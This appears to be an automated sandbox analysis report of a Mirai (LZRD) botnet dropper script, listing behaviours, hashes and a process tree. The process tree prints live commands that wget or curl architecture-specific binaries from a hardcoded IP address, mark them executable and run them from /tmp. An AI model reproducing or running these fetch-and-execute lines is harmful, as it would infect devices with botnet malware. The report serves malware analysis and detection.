Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
07/12/2024, 15:33
Static task
static1
Behavioral task
behavioral1
Sample
cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh
-
Size
2KB
-
MD5
5562819bed77a9cb62743843ee3a42ba
-
SHA1
7b3934c9807c5fa51b62ac5758f33c68015e8591
-
SHA256
cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e
-
SHA512
d907f11e575e06dbcf6936eeb0deaa7112eb2b063c54334c5f5fcd5cb3cb7d725419ce3dd4e9fc12c727b02fa0db090c50194638cdcbe68863ea0c7acd370611
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 828 chmod 862 chmod 874 chmod 885 chmod 727 chmod 799 chmod 856 chmod 868 chmod 880 chmod 891 chmod 733 chmod 755 chmod 791 chmod 850 chmod 805 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Space 728 Space /tmp/Space 734 Space /tmp/Space 756 Space /tmp/Space 792 Space /tmp/Space 800 Space /tmp/Space 806 Space /tmp/Space 829 Space /tmp/Space 851 Space /tmp/Space 857 Space /tmp/Space 863 Space /tmp/Space 869 Space /tmp/Space 875 Space /tmp/Space 881 Space /tmp/Space 886 Space /tmp/Space 892 Space -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space -
resource yara_rule behavioral4/files/fstream-5.dat upx behavioral4/files/fstream-6.dat upx behavioral4/files/fstream-7.dat upx behavioral4/files/fstream-8.dat upx -
description ioc Process File opened for reading /proc/113/status Space File opened for reading /proc/384/status Space File opened for reading /proc/388/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/9/status Space File opened for reading /proc/77/status Space File opened for reading /proc/21/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/377/status Space File opened for reading /proc/534/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/6/status Space File opened for reading /proc/20/status Space File opened for reading /proc/832/status Space File opened for reading /proc/79/status Space File opened for reading /proc/104/status Space File opened for reading /proc/239/status Space File opened for reading /proc/71/status Space File opened for reading /proc/330/status Space File opened for reading /proc/4/status Space File opened for reading /proc/13/status Space File opened for reading /proc/36/status Space File opened for reading /proc/496/status Space File opened for reading /proc/694/status Space File opened for reading /proc/774/status Space File opened for reading /proc/10/status Space File opened for reading /proc/19/status Space File opened for reading /proc/164/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/80/status Space File opened for reading /proc/695/status Space File opened for reading /proc/355/status Space File opened for reading /proc/12/status Space File opened for reading /proc/15/status Space File opened for reading /proc/37/status Space File opened for reading /proc/75/status Space File opened for reading /proc/484/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/2/status Space File opened for reading /proc/17/status Space File opened for reading /proc/66/status Space File opened for reading /proc/698/status Space File opened for reading /proc/827/status Space File opened for reading /proc/833/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/3/status Space File opened for reading /proc/8/status Space File opened for reading /proc/331/status Space File opened for reading /proc/114/status Space File opened for reading /proc/144/status Space File opened for reading /proc/147/status Space File opened for reading /proc/72/status Space File opened for reading /proc/326/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/7/status Space File opened for reading /proc/11/status Space File opened for reading /proc/69/status Space File opened for reading /proc/1/status Space File opened for reading /proc/5/status Space -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 804 cat 795 wget 797 curl 798 cat 802 wget 803 curl -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.arm curl File opened for modification /tmp/Space.arm7 wget File opened for modification /tmp/Space.sparc curl File opened for modification /tmp/Space.x86 curl File opened for modification /tmp/Space.i686 curl File opened for modification /tmp/Space.mpsl wget File opened for modification /tmp/Space.arm7 curl File opened for modification /tmp/Space.m68k wget File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.arm5 wget File opened for modification /tmp/Space.arm5 curl File opened for modification /tmp/Space.sh4 curl File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.i686 wget File opened for modification /tmp/Space.mips wget File opened for modification /tmp/Space.arm wget File opened for modification /tmp/busybox cp File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/Space.arm6 curl File opened for modification /tmp/Space.ppc curl File opened for modification /tmp/Space.sh4 wget File opened for modification /tmp/Space.mips curl File opened for modification /tmp/Space.mpsl curl File opened for modification /tmp/Space.ppc wget File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.arm6 wget File opened for modification /tmp/Space.m68k curl
Processes
-
/tmp/cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh/tmp/cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh1⤵
- Writes file to tmp directory
PID:696 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:702
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:705
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:721
-
-
/bin/catcat Space.arc2⤵PID:726
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc systemd-private-17bbbb0f29ad499e9de91ce9ceeb7e2b-systemd-timedated.service-NQ2Hly2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:728
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:730
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:731
-
-
/bin/catcat Space.x862⤵PID:732
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.x86 systemd-private-17bbbb0f29ad499e9de91ce9ceeb7e2b-systemd-timedated.service-NQ2Hly2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:734
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:736
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/catcat Space.x86_642⤵PID:754
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.x86 Space.x86_64 systemd-private-17bbbb0f29ad499e9de91ce9ceeb7e2b-systemd-timedated.service-NQ2Hly2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:756
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:760
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/catcat Space.i6862⤵PID:789
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.i686 Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:792
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:795
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:797
-
-
/bin/catcat Space.mips2⤵
- System Network Configuration Discovery
PID:798
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:800
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:802
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.mips642⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:803
-
-
/bin/catcat Space.mips642⤵
- System Network Configuration Discovery
PID:804
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:806
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:807
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/catcat Space.mpsl2⤵PID:826
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:829
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:847
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/catcat Space.arm2⤵PID:849
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:851
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:853
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/catcat Space.arm52⤵PID:855
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:857
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:859
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/catcat Space.arm62⤵PID:861
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:863
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:865
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:866
-
-
/bin/catcat Space.arm72⤵PID:867
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:869
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:871
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/catcat Space.ppc2⤵PID:873
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:875
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.sparc2⤵PID:877
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.sparc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/catcat Space.sparc2⤵PID:879
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:881
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:882
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/catcat Space.m68k2⤵PID:884
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:886
-
-
/usr/bin/wgetwget http://64.235.45.196/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:888
-
-
/usr/bin/curlcurl -O http://64.235.45.196/hiddenbin/Space.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/catcat Space.sh42⤵PID:890
-
-
/bin/chmodchmod +x busybox cd702d5c5d94251d5a65095cac33dd51bac5b101f85800cedd37556c4ef4fa7e.sh Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:892
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5aec405b96527fb13ac254737c4e99388
SHA1c6accf2fe5ead7e9eb8bfe46083c2c26c981a812
SHA256643028ebd06ad279eaec9747223df4f8f37f8ac25dad3836d5dab7ac06ddec25
SHA512cd83c16a621448a8a622987f99a4e21d12432eb7aee58354ca9ad076f2a5ed136e8726aca5ae6b759746cbd1a1f7b88ccc637b2a2a75249a954dba2fd791038c
-
Filesize
36KB
MD5d294488fa1da5599dbeff70a8f8facfd
SHA151b4cef2d5975502642c27575caaf163b27ac93d
SHA2562e0182aa49aa05af67a8de21340458cef09572828993b1a0d31ba70f3af274ff
SHA51290034d380995e5c978c3e69f25e612612d02e03b2f994e097fddb625d805681f151768a8ec279e3270cf4e29829845bd9be9fe22ba46f481b43c5bd3ce85203a
-
Filesize
37KB
MD55a7d8d47b585ede114c2b1347ac1b2d1
SHA187d3c5ebff1f235dfc1135c4571afede2698cd59
SHA256474c75d0648d4fd8ba02f1bf140caa40d820c0a1653c94265edb9feafc737eb2
SHA5121541200e7c17cb7da6388fbddafa9dc3f58f6480469ad0e71d7c72770e3980189ae469d824a483dc0337edf5df6e2a4e00a8790c80edf668f8e14d54ba648829
-
Filesize
43KB
MD56a0b8c5c9c76155d79b10d1e4935a295
SHA16af1ecc7237d7a864454a564f8f9092cba21c86f
SHA256f283e689e8342b62ae6b7f8d86f4bf08b08ea3a437a8683597a96cc0552ff2e6
SHA512890fc040cda6de308b6a323087fa9e3208d603bf283da317e475fee00ddba9d26a95d21bc7ae5cfc0afeeee54f203992a3d9e1ea5d2d674dc871fd0a88fa2584
-
Filesize
95KB
MD558f8d8b8020569858c2ba1d62150ac3a
SHA1c861d4213716007ad54e27d809e5f36168b3ba08
SHA256146b00117560177ad077d15c9c6bd613bfcfb56e2970e47d20bbf95f3be2e5be
SHA5122b4de71f266f5e4799fb3609e0036fae1c2fbe090407a51b9d5bc58e47ffbd6cc348699d624869e0e8b7e293a13f687fbb6e54c8ecf5d990ede50ea3835c5011
-
Filesize
113KB
MD585a94700ab0be116bd593ba440c7a408
SHA126a4c515cbc06940c20c50d88c8910ba09fe6341
SHA256b0dc38b80815fa4189ca8f3b607da6ddc060623d61696afc0bd0aaf90261de43
SHA5126bc8be6c6feb701e49ab221cf5fb92d253c353d7dde98499439c861af999e42f68674e9d99dbbc688abc2bf7c02312198028605c924dc6d5ba2ef18220e42622
-
Filesize
857KB
MD56ffc46165b5d9726a6607f3ea5305589
SHA1ab127220f42e816b413dde0d17031e251a7bc98f
SHA25680d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c
SHA512456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8